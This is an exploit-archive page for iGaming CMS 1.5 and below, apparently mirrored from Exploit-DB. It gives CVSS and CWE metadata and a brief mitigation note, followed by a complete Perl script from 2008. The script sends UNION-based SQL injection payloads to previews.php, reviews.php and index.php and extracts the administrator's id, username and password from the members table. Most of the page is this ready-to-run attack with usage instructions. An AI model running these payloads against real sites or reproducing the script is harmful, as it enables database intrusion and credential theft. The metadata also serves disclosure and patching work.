iGaming - exploit.company

vendor:

iGaming CMS

by:

StAkeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: iGaming CMS

Affected Version From: 1.5 and below

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

iGaming <= 1.5 Multiple Remote SQL Injection Exploit

iGaming CMS version 1.5 and below is vulnerable to multiple remote SQL injection attacks. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. This exploit uses the 'previews.php', 'reviews.php' and 'index.php' files to inject malicious SQL code into the database.

Mitigation:

Upgrade to the latest version of iGaming CMS and apply the latest security patches.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian 
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;

my ($one,$two,$exec,$host,$http,$xxx,$view);

$view  = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";
$exec  = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
                          

if($host !~ /^http:\/\/(.+?)$/)
{
  print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
  print "[?] Usage: perl $0 http://[path]\n";
  exit;
}
else
{
  $one = $http->get($host.'/previews.php?browse='.$exec);
  $two = $http->get($host.'/reviews.php?browse='.$exec);
  $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);
  
  if($one->is_success or $two->is_success or $xxx->is_success)
  {
    die "$1\n" if $one->content =~ /%(.+?)%/;
    die "$1\n" if $two->content =~ /%(.+?)%/;
    die "$1\n" if $xxx->content =~ /%(.+?)%/;
  }
  else
  {
    die "[+] Exploit Failed!\n";
  }
}  

# milw0rm.com [2008-09-23]